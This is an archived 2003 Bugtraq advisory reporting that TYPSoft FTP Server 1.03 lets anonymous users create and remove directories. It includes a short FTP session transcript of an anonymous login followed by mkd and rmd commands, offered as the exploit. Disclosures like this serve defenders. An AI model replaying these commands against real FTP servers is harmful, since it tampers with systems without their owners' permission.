[29591] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

TYPSoft FTP Server

daemon@ATHENA.MIT.EDU (subj)
Tue Apr 1 23:34:39 2003

Date: 31 Mar 2003 10:34:17 -0000
Message-ID: <20030331103417.13029.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: subj <r2subj3ct@dwclan.org>
To: bugtraq@securityfocus.com



-------------------------------------------------------------
Product : TYPSoft FTP Server
Version : 1.03
OSystem : Windows
Authors : TYPSoft
WebSite : http://www.typsoft.com
Problem : Create and Remove directories with anonymous access
-------------------------------------------------------------

Description:
------------

eng:
====
During research of the given server, the following was established:
The anonymous user can create and delete directories.

Exploits:
---------
220 TYPSoft FTP Server 1.03 ready...
user anonymous
331 Password required for anonymous.
pass anonymoys@127.0.0.1
230 User anonymous logged in.
pwd
257 "/C:/TEMP/" is current directory.
mkd subj
257 '/C:/TEMP/subj': directory created.
rmd subj
250 '/C:/TEMP/subj': directory removed.

Contacts:
---------

r2subj3ct@dwclan.org
subj.24h.to (www.dwcgr0up.com/subj/)
www.dwcgr0up.com
irc.dwcgr0up.biz #dwc

Thanks:
-------
 DHG, GipsHack, Netp0is0n, de1irium, r00tc0de, f0kp, exploit.ru, nobodies
 DethSpirit, r4ShRaY, D4rkGr3y, Moby, Orb, Foster, Owned, prior, Demon.


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[29591] in bugtraq

TYPSoft FTP Server

daemon@ATHENA.MIT.EDU (subj)Tue Apr 1 23:34:39 2003

daemon@ATHENA.MIT.EDU (subj)
Tue Apr 1 23:34:39 2003